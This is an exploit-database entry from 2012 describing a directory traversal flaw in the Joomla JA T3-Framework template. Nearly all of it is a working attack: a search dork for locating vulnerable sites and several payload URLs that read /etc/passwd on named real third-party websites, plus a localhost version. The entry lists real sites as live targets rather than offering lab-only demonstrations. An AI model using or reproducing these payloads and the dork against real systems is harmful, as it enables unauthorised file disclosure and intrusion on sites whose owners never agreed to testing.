Joomla template JA T3-Framework Directory Traversal Vulnerability

2012-04-17T00:00:00
ID 1337DAY-ID-18065
Type zdt
Reporter indoushka
Modified 2012-04-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =======================================================================
Joomla template JA T3-Framework Directory Traversal Vulnerability 0-Day
=======================================================================

# Vendor:
hhttp://extensions.joomla.fr/extensions/index-des-extensions-fr/1788-Templates/4151-ja-t3-framework-joomla-15

# Author : indoushka

# Tested on : Ubuntu Linux 9.10

########################################################


# Dork : inurl:/index.php?jat3action=

# Demo :
http://www.maxim-tours.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=
gzip&type=css&v=1

http://www.taqadoumy.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
ip&type=css&v=1

http://iraneconomist.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
ip&type=css&v=1

http://yxact.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&t
ype=css&v=1

http://www.rtmcsumut.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
ip&type=css&v=1

http://news.lk/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&typ
e=css&v=1

http://www.guiaenarm.net/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
ip&type=css&v=1

http://britanskie-kotiki.ru/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action
=gzip&type=css&v=1

http://profidom.com.ua/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip
&type=css&v=1

-------------

http://localhost/jojo/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&
amp;type=css&v=1

******************************************************



#  0day.today [2018-04-01]  #